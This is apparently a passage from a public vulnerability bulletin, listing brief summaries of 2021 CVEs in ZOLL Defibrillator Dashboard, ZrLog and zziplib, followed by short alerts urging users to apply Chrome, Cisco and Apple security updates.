ZOLL Defibrillator Dashboard, versions prior to 2.2: The affected products use a hardcoded encryption key in the data exchange process. This could allow an attacker to gain access to sensitive information. 2021-06-16 not yet calculated CVE-2021-27481
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, versions prior to 2.2: The affected products contain insecure filesystem permissions that could allow a lower-privilege user to escalate privileges to an administrative-level user. 2021-06-16 not yet calculated CVE-2021-27483
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, versions prior to 2.2: The application allows users to store their passwords in a recoverable format, which could allow an attacker to retrieve the credentials from the web browser. 2021-06-16 not yet calculated CVE-2021-27485
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, versions prior to 2.2: The web application allows a non-administrative user to upload a malicious file. This file could allow an attacker to remotely execute arbitrary commands. 2021-06-16 not yet calculated CVE-2021-27489
MISC
zrlog — zrlog
 
A cross-site scripting (XSS) vulnerability exists in the comment section in ZrLog 2.1.3, which allows remote attackers to inject arbitrary web script via the nickname parameter, steal administrator cookies, and gain access to the admin panel. 2021-06-15 not yet calculated CVE-2020-21316
MISC
MISC
MISC
zziplib — zziplib
 
Infinite Loop in zziplib v0.13.69 allows remote attackers to cause a denial of service via the return value “zzip_file_read” in the function “unzzip_cat_file”. 2021-06-18 not yet calculated CVE-2020-18442
MISC


Google Releases Security Updates for Chrome

06/18/2021 07:05 AM EDT

Original release date: June 18, 2021

Google has released Chrome version 91.0.4472.114 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. One of these vulnerabilities—CVE-2021-30554—has been detected in exploits in the wild.

CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates.


Cisco Releases Security Updates for Multiple Products

06/17/2021 06:51 AM EDT

Original release date: June 17, 2021

Cisco has released security updates to address vulnerabilities in multiple Cisco products. An attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

CISA encourages users and administrators to review the following Cisco advisories and apply the necessary updates:


Apple Releases Security Updates for iOS 12.5.4

06/15/2021 06:43 AM EDT

Original release date: June 15, 2021

Apple has released security updates to address vulnerabilities in iOS 12.5.4. An attacker could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review the Apple security update and apply the necessary updates.
